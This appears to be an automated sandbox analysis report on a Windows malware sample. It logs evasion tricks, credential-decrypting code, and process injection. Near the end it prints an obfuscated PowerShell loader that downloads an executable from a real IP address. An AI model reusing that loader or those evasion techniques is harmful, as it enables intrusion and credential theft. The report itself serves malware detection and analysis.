                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAPI/Special instruction interceptor: Address: 17332BC
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: csoss.exe, 00000006.00000002.1393664789.00000000017F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7370Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7522Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-102278
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAPI coverage: 4.4 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 7728Thread sleep count: 7370 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep count: 7522 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 2062 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5352Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0021445A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021C6D1 FindFirstFileW,FindClose,6_2_0021C6D1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0021C75C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0021EF95
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0021F0F2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0021F3F3
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_002137EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00213B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00213B12
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0021BCBC
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001B49A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: csoss.exe, 00000006.00000003.1376646997.00000000018A8000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1376729063.00000000018A8000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1376646997.0000000001889000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.6.drBinary or memory string: WR_HGfSGVWXMWGD3
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: RegSvcs.exe, 00000007.00000002.2505048024.0000000000776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                    Source: powershell.exe, 00000003.00000002.1400465631.000000000839E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxM:
                    Source: csoss.exe, 00000006.00000002.1393664789.00000000017F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470C168 LdrInitializeThunk,LdrInitializeThunk,7_2_0470C168
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00223F09 BlockInput,6_2_00223F09
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_001B3B3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_001E5A7C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B4B37 LoadLibraryA,GetProcAddress,6_2_001B4B37
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_01733528 mov eax, dword ptr fs:[00000030h]6_2_01733528
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_01733588 mov eax, dword ptr fs:[00000030h]6_2_01733588
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_01731EC8 mov eax, dword ptr fs:[00000030h]6_2_01731EC8
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,6_2_002080A9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DA124 SetUnhandledExceptionFilter,6_2_001DA124
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_001DA155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi32_7560.amsi.csv, type: OTHER
                    .NET source code references suspicious native API functions
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\csoss.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 280008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002087B1 LogonUserW,6_2_002087B1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_001B3B3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_001B48D7
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00214C27 mouse_event,6_2_00214C27
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXG